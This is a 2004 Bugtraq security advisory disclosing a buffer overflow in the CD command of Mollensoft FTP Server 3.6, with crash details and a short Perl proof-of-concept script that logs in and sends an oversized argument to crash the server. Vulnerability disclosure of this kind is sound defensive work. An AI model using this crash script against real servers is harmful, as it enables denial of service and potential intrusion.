[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Mollensoft ftp Server ver 3.6 Buffer overflow
From: Chintan Trivedi <chesschintan () hotmail ! com>
Date: 2004-05-28 5:38:45
Message-ID: 20040528053845.14885.qmail () www ! securityfocus ! com
[Download RAW message or body]
[ Mollensoft ftp Server ver 3.6 Buffer overflow ]
-----------------------------------------------------
EOS Advisory - http://www.eos-india.net
-----------------------------------------------------
Vendor : http://www.mollensoft.com
Version : 3.6 (latest)
Vulnerability : Buffer Overflow
About Product
=============
Mollensoft Lightweight FTP Server is a powerful, reliable FTP server for \
Windows95/98/NT/2000. It includes New Security and Faster, More Efficient Rules Based \
Access, Live Client activity Window as well as a specific Client breakdown window \
(below) and significant enhancement in speed/stability and is especially designed for \
Intranet Use!
(direct quote from website)
Description
===========
A buffer overflow vulnerability exists in its "CD" command which can lead to READ \
any memory location. An attacker can pass a string of 238 bytes to the "CD" command \
to cause this overflow.
ftp> CD AAAAAAA...(238 times)
The ftpd deamon at this point crashes with an error message saying
"The instruction at 0x50e0931f referenced memory at 0x41414141. The memory could not \
be read."
On debugging the process, the instruction at memory location "0x50E0931F" is found \
to be "CMP BYTE PTR DS:[ESI], 1F" And the register ESI contains "41414141". So \
basically the application is trying to READ from 0x41414141. Thus in this manner an \
attacker can force the application to READ from any memory location. In worst cases \
if properly exploited the vulnerability can also lead to a remote exploit giving \
complete access to the vulnerable system.
Proof Of Concept
================
# C:\Active Perl\perl
# POC for mollensoft ftp server 3.6
# Will crash the deamon
use IO::Socket::INET;
$host = "localhost";
$port = 21;
$buffer = "A" x 238;
$socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
print $socket "USER root\r\n";
$socket->recv($test,100);
print $test;
print $socket "PASS password\r\n";
$socket->recv($test,100);
print $test;
print $socket "CD $buffer\r\n";
$socket->recv($test,100);
print $test;
close($socket);
Credits
=======
Chintan Trivedi - chesschintan [at] hotmail.com
http://www.eos-india.net
Eye on Security Research Group - India
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic